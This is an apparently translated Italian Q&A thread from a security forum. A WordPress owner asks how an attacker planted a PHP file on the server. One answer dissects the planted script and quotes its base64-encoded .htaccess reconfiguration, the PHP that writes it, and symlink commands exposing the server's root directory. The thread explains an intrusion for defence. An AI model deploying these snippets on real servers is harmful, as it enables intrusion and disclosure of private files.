In che modo l'hacker ha avuto accesso alla mia cartella di caricamento di WordPress? [chiuso]

2

Ieri ho scoperto che esiste questo link file PHP nel mio server amici. Voglio sapere come è stato l'hacker in grado di caricarlo lì? Ho letto le domande simili ma non ho trovato una risposta corretta.

EDIT: -

Oggi ho saputo che il sito WordPress è stato violato da brute-forzando la password (la password è strong). Ancora non so come siano riusciti a decifrare quella password.

Dopo aver infranto la password, hanno effettuato l'accesso e caricato i file php. Dopo aver consultato Donnazmi.txt, ho scoperto che anche molti altri siti sono stati hackerati lo stesso giorno (il 13 luglio). Gli hack che usano lo stesso script sono ancora in corso. La password per il server WordPress è stata cambiata in quella più complessa e quei file php sono stati cancellati.

Grazie per le risposte e i commenti. Spiacenti, avrei dovuto fornire maggiori informazioni durante la pubblicazione della domanda.

    
posta Sai Krishna 05.08.2015 - 19:38
fonte

2 risposte

6

Una volta che il file è stato caricato sul server ( sfruttando un bug in un tema di wordpress ) , .htaccess è riconfigurato in modo che qualsiasi file .txt venga interpretato dal server come uno script .php e seguirà i collegamenti simbolici.

Il passo successivo è il trucco, crea un link simbolico da / a Donnazmi.txt (2 modi)

Il codice non è molto complesso, stampa un modulo html con le configurazioni necessarie per eseguire i passaggi di exploit (è necessario inviare una richiesta di post con Donnazmi come chiave di post per vederlo).

Codice spiegato:

.htaccess reconfig:

$fvckem = 'T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';

Questa è una stringa codificata in base 64, che si traduce in:

Options Indexes FollowSymLinks   
DirectoryIndex ssssss.htm        
AddType txt .php                 
AddHandler txt .php              

Quindi con quella configurazione:

$file = fopen(".htaccess","w+"); // open the file
$write = fwrite ($file ,base64_decode($fvckem)); 
// write the new config inside the file

link simbolici:

// 1. this is a link with the linux comand 'ln'
system('ln -s / Donnazmi.txt');
// 2. this is a link php native function
$Donnazmi = symlink("/","Donnazmi.txt");

Dopo l'esecuzione, ogni volta che visita example.com/Donnazmi.txt, vede un elenco della directory root del tuo server ( Options Indexes tm).

Quindi sì ricostruisci quella macchina. e controlla il software prima di installarlo.

    
risposta data 06.08.2015 - 03:52
fonte
1

Il video che ho trovato è la prima cosa che emerge quando ho cercato su Google il nome dell'hacker.

Hai installato il tema WordPress Cold Fusion installato per caso?

Ecco il cosiddetto video di Mauritania Attacker sulla spiegazione di come sfrutta lo specifico tema WordPress da caricare file sul server.

    
risposta data 05.08.2015 - 20:24
fonte

Leggi altre domande sui tag